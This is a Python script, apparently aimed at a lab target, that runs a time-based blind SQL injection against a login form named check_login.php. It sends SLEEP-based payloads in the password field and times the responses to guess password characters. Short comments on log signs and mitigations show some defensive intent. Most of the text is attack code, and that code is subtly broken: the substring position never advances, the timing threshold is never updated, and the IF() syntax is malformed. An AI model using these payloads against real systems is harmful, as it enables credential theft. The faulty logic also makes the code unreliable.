- # test' OR IF(substring(password,1,1)='a' SLEEP(10), null)' --
- # fetch("http://reign-vuln-1.azurewebsites.net/check_login.php", {"credentials":"include","headers":{"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","accept-language":"en-US,en;q=0.9","cache-control":"max-age=0","content-type":"application/x-www-form-urlencoded","upgrade-insecure-requests":"1"},"referrer":"http://reign-vuln-1.azurewebsites.net/","referrerPolicy":"no-referrer-when-downgrade","body":"myusername=admin&mypassword=test%27+OR++IF%28substring%28password%2C1%2C1%29%3D%27c%27+SLEEP%2810%29%2C+null%29%27+--&submit_button=Submit","method":"POST","mode":"cors"});
- # Time-based blind SQL injection probe against a login form: each request
- # carries a SQL fragment in the password field and the script records how
- # long the response takes to come back.
- # NOTE(review): indentation was lost in this paste, so the nesting of the
- # two loops and the `if` below cannot be read from the listing itself.
- #
- # Defender view: in server logs this appears as a burst of POSTs to
- # check_login.php from a single client whose `mypassword` value contains
- # SQL syntax (SLEEP(, substring(, a trailing --) and, wherever the fragment
- # is actually executed, responses delayed by roughly ten seconds.
- # Mitigation belongs in the login query: bind username and password as
- # query parameters instead of concatenating them into SQL, verify a salted
- # password hash in application code rather than comparing inside the
- # query, and rate-limit repeated failed logins per account and per client.
- import requests
- # rich's print replaces the builtin print for the rest of the script.
- from rich import print
- # Login handler being probed; note the scheme is plain http://.
- url = "http://reign-vuln-1.azurewebsites.net/check_login.php"
- # Candidate characters tried for each guess: lowercase letters and digits.
- CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"
- # Accumulates one guessed character per outer pass.
- key = ""
- # Collects one {char: seconds} timing dict per outer pass.
- l_guess = []
- # Ten outer passes.
- for _ in range (10):
- # Per-pass state: latency threshold, current guess, and timings by char.
- highest_time = 0
- highest_char = "a"
- key_guesses = {}
- for char in CHARSET:
- # The password field carries a fragment that compares
- # substring(password,1,1) with `char` and names SLEEP(10).
- body= {"myusername":"admin", "mypassword":f"test' OR IF(substring(password,1,1)='{char}' SLEEP(10), null)' --'"}
- # `re` here is the requests Response object, unrelated to the stdlib
- # regex module of the same name.
- re = requests.post(
- url= url,
- json=body
- )
- # Response.elapsed: time from sending the request until the response
- # headers were parsed.
- ti = re.elapsed.total_seconds()
- # Keep `char` as the guess when its latency exceeds highest_time.
- if ti > highest_time:
- highest_char = char
- # Record this character's latency for the per-pass report.
- key_guesses[char] = ti
- print (highest_char)
- key += highest_char
- l_guess.append(key_guesses)
- # Final output: every timing dict, then the accumulated string.
- print(l_guess)
- print(key)